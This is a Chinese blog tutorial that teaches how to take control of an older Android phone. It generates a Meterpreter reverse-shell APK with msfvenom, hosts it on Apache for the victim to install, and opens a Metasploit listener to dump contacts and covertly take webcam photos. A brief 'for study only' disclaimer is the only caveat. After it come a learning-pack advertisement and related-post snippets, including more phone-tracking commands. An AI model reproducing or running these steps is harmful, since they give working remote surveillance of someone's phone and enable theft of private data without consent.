kali 使用后台进行手机拍照,查看定位,获取信息,(通讯录等操作)

原创 已于 2024-04-29 10:50:41 修改 · 550 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#智能手机 #android #系统安全 #网络安全 #web安全 #安全架构 #计算机网络

于 2024-04-29 10:50:24 首次发布
本文详细介绍了如何利用KaliLinux和Meterpreter技术入侵老版本安卓手机,实现控制拍照、查看定位和获取通信录等功能。同时,作者分享了网络安全学习资源包,包括学习路线、视频教程和工具等内容。
控制安卓手机拍照,查看定位,获取通信录
  • 引言
  • 准备工作
    • 1. kali、手机
    • 2.戴上眼睛注意别敲错命令,复制的时候注意看!
  • 开始了!!!
    • First
    • Second

引言

** 大家好,我是Zues,今天我来教会大家一个入侵安卓手机控制手机拍照,查看定位,获取通信录,查看手机内容。 本作品只适用于老版本安卓,文章只作为研讨技术,不得非法使用
首先准备工具 **

准备工作

1. kali、手机

只需要大家准备kali操作系统以及一部手机就好。若是大家做过程中遇到问题,欢迎留言交流

2.戴上眼睛注意别敲错命令,复制的时候注意看!

开始了!!!

First

1. 打开kali 进入终端:
2. 第一生成宿主程序Test.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.46 LPORT=8888 R > Test.apk

成功后如截图所示:
成功后如截图所示

注意 LHOST是你自己的kali的ip怎么查看自己kali的是以下命令 端口LPRT你自己写

ifconfig

2.将其移动到apache2服务器目录下并启动apache2服务器

cp Test.apk /var/www/html
service apache2 start

成功后如截图所示:
成功后如截图所示
注意 需要管理员root下 否则输入sudo cp Test.apk /var/www/html 输入密码的时候不会回显

sudo cp Test.apk /var/www/html

Second

如果你是第一次使用apache2服务器,则需要修改文件

vi /var/www/html/index.html

找到以下图片需要增加一行代码,红色框框出来了别改错否则回去重新看一下。
增加一行时可以使用 i 切换到输入状态,否则你是写不上东西的,输入错了,可以输入**:q!不保存退出,输对了保存退出时同样的:wq**保存并退出;
效果
这时候手机输入你kali的ip就能访问下载这个apk文件了。

点download就能下载了
下载好在手机上安装,要是访问不了,请在评论区联系我!!!
接下来安装好不用打开,再kali上设置监听:

输入msfconsole

msfconsole

打开该框架
然后继续
设置监听

use multi/handlerr

设置载荷 和之前一样,别弄错了

set payload android/meterpreter/reverse_tcp


show options

查看到需要设置以下参数
设置参数

set LHOST 10.0.0.46
set LPORT 8888

和你ip一样,端口和之前一样

输入run执行起来
run
首先查看系统信息
在这里插入图片描述

再查看安装app文件
在这里插入图片描述

查看手机通信录
dump_contacts
查看手机通信录
在这里插入图片描述

在这里插入图片描述

查看手机拍张照
webcam_snap
这里就不用给大家看拍的是什么了吧!!!

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击免费领取】优快云大礼包:《黑客&网络安全入门&进阶学习资源包》

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

👋全套《黑客&网络安全入门&进阶学习资源包》👇👇👇

这份完整版的学习资料已经上传优快云,也可以微信扫描下方优快云官方认证二维码免费领取【保证100%免费

img

kali精准定位地理位置
QQ670663的博客
01-17 2万+
一、GPS简介 物理位置定位:根据IP的定位不准确,容易被欺骗,网上有很多IP伪造技术,所以定位肯定也不准确。 GPS全球定位系统:(使用最广泛) GPS是英文Global Positioning System(全球定位系统)的简称。GPS起始于1958年美国军方的一个项目,1964年投入使用。 全球定位系统,大家比较熟悉的就是GPS。除了美国以外,世界其他经济体也有自己的定位系统比如:欧州-伽利略,俄罗斯-格洛纳斯,中国-北斗导航 民用用途:地址勘探,航空航海定位手机设备都支持定位服务很多网站,
如何使用Kali进行信息收集?
hack0919的博客
05-28 2721
信息的收集决定着渗透的成功与否
kali:获取高精度的定位
我的学习笔记
09-10 1万+
参考:https://github.com/thewhiteh4t/seeker 操作案例:https://asciinema.org/a/195052 可以高精度的定位设备所在位置;但需要可以访问到谷歌地图;
渗透测试后台目录扫描工具dirmap-kali版本
11-23
Kali Linux等专业的安全操作系统中,通过编译源代码可以安装最新版本的工具,从而确保使用的是最稳定和最安全的版本。 渗透测试是一种重要的安全措施,通过模拟黑客攻击来评估系统的安全强度。在这一过程中,后台...
kali linux 系统版本的查看方法
09-14
通过上述方法,我们可以快速准确地获取Kali Linux的操作系统版本和内核版本信息。这对于确保系统的安全性、及时更新补丁以及进行兼容性测试等方面都是非常有帮助的。希望这些方法能对您在使用Kali Linux时提供一定的...
使用kali对安卓手机进行渗透测试
热门推荐
lxy123_com的博客
02-12 2万+
实验环境:Kali虚拟机一台,4G运行,IP地址192.168.0.105;安卓手机一部,建议使用不用的破手机 实验目的:对安卓机进行攻击测试 实验步骤: (一),配置卡里环境 1,kali配置网络 ┌──(root????kali)-[~] └─#ifconfig 查看kali本机IP地址 eth0: flags=4
调用手机摄像头
qq_52660776的博客
04-10 407
import cv2 url = "rtsp://admin:admin@192.168.137.29:8554/live" cap = cv2.VideoCapture(url)#读取视频流 while(cap.isOpened()): ret, frame = cap.read() print('success') cv2.imshow('frame',frame) if cv2.waitKey(1) & 0xFF == ord('q'): bre
wwwscan-很强大的后台扫描工具
10-22
很强大的后台扫描工具 很强大的后台扫描工具
网络攻防——kali操作系统基本使用-调用摄像头
A
04-05 6855
kali的小小尝试
kali使用seek追踪定位IP地址(渗透笔记)
weixin_43899811的博客
11-27 4972
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
kali系统支持那些手机_北斗卫星导航系统完成了全球组网,苹果手机也支持北斗导航系统了...
weixin_36289742的博客
12-17 293
大家都知道,我国的北斗卫星导航系统已经完成了全球组网,这是属于我们自己的卫星定位系统,卫星的使用寿命是有限的,使用过一段时间之后就会报废,就需要源源不断的发射卫星上天进行补充,所以维修费用非常高,为了有钱可以维持导航系统,美国那是开放了民用GPS信号的使用权限,面向全球免费开放。虽然信号是免费的,但是芯片的是要收费的,我们手机当中的GPS定位功能都希望在里面嵌入一个定位芯片,而每一个GP...
kali GPS定位seeker ngrok
qq_44637753的博客
04-12 8534
ngrok下载地址:https://ngrok.com/download seeker下载地址:https://github.com/thewhiteh4t/seeker 地址压缩:https://sina.lt/ seeker安装 git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod +x install.sh ./install.sh python3 seeker.py -h usage: seeker.py [-h]
手机相册查看
u011313703的博客
01-21 704
lang="en">     charset="UTF-8">   name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" />   手势实现图像预览   rel="stylesheet" href="style_c0d0732.
如何扫描网页后台地址
dzqxwzoe的博客
03-14 3743
以扫描网站的后台地址为例方法一:使用dirsearch首先需要在kali安装dirsearch!使用dirsearch-u 来扫描网站!扫描出来的绿色的就是可以访问的,选择带admin的网站进行访问,极有可能是网站后台!!方法二:使用御剑工具:可以看到网站写的!首先添加ip!get方式,返回内容比较准确post模式,扫描速度快,但内容准确率比get低线程越大扫描速度越快,但是结果不准确选择状态码:200和3xx。
Kali无法定位软件包的解决方案
weixin_34334744的博客
01-09 4533
异常处理汇总-服 务 器 http://www.cnblogs.com/dunitian/p/4522983.html   以前遇到过,后来好久没碰Linux了,忘记了。之后上网搜了一下。。。。呃,发现解决方案是我自己写的。。。于是蛋疼了一下,好吧记录一下吧 场景还原:http://www.cnblogs.com/dunitian/p/4712323.html   安装软件的时候出现“无...
使用kali对同一局域网内的设备进行断网和查看设备图片
goddreamyyh的博客
01-11 2万+
首先,如果kali是在虚拟机中运行的,需要使用桥接网络。 断网操作 1,首先,查看自己的IP,我的是192.168.1.125 命令:ifconfig 2,然后,查看当前局域网的还有那些设备。 命令:fping -g 192.168.1.125/24 3,然后选择一个设备作为攻击目标,拿自己的手机来做栗子>!< 查看了我的手机的IP为192.168.1.100(拿我...
kali手机进行定位,轨迹进行追踪。都需要配置哪些软件,怎么操作
最新发布
07-27
Kali Linux中对手机进行定位和轨迹追踪,通常涉及网络侦察、信号分析和位置信息提取等操作Kali Linux预装了多种工具,可支持此类任务。以下是所需的工具配置及具体操作步骤。 ### 工具配置 1. **Aircrack-ng**:用于无线网络分析和数据包捕获,适用于Wi-Fi信号追踪。 2. **nmap**:用于端口扫描和网络发现,识别目标设备的开放端口和服务。 3. **Wireshark**:深度网络流量分析工具,可解析捕获的数据包,获取设备通信信息。 4. **GPSD**:用于处理GPS设备的定位数据,适用于连接外部GPS模块。 5. **Metasploit Framework**:渗透测试工具,可用于漏洞利用和远程控制设备。 ### 操作步骤 #### 1. 网络扫描与发现 使用`nmap`进行网络扫描,以发现目标手机所在的IP地址和开放端口: ```bash nmap -sn 192.168.1.0/24 ``` 该命令将扫描本地网络中的所有活跃设备,列出其IP地址和MAC地址,从而识别目标手机。 #### 2. 无线信号捕获 使用`airodump-ng`捕获Wi-Fi信号,分析目标手机的无线通信: ```bash airodump-ng wlan0 ``` 此命令将显示所有附近无线设备的BSSID、信道和客户端信息,帮助识别目标设备。 #### 3. 数据包分析 使用`Wireshark`捕获和分析目标设备的网络流量,以提取位置相关的信息(如IP Geolocation): ```bash wireshark -i wlan0 -f "host 192.168.1.10" ``` 该命令将捕获指定IP地址的所有流量,通过分析流量中的DNS请求或HTTP通信,可以推断设备的使用情况和可能的位置信息。 #### 4. GPS数据处理 如果目标设备连接了外部GPS模块,可以使用`GPSD`获取其位置信息: ```bash gpsd /dev/ttyUSB0 -F /var/run/gpsd.sock ``` 启动GPSD服务后,使用`cgps`或`gpsmon`查看实时位置数据: ```bash cgps -s ``` #### 5. 漏洞利用与控制 如果目标设备存在漏洞,可使用`msfconsole`进行渗透测试并获取控制权限: ```bash msfconsole use exploit/android/browser/webview_addjavascriptinterface set LHOST 192.168.1.5 set LPORT 4444 exploit ``` 此步骤需确保合法授权,未经授权的渗透测试属于违法行为。 ### 注意事项 - 所有操作必须在合法授权范围内进行,未经授权的追踪行为可能涉及隐私侵犯和法律风险[^3]。 - 操作过程中应避免对网络性能造成显著影响,建议在非高峰时段执行扫描和捕获任务。 - 捕获和分析的数据应妥善保存,防止敏感信息泄露。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值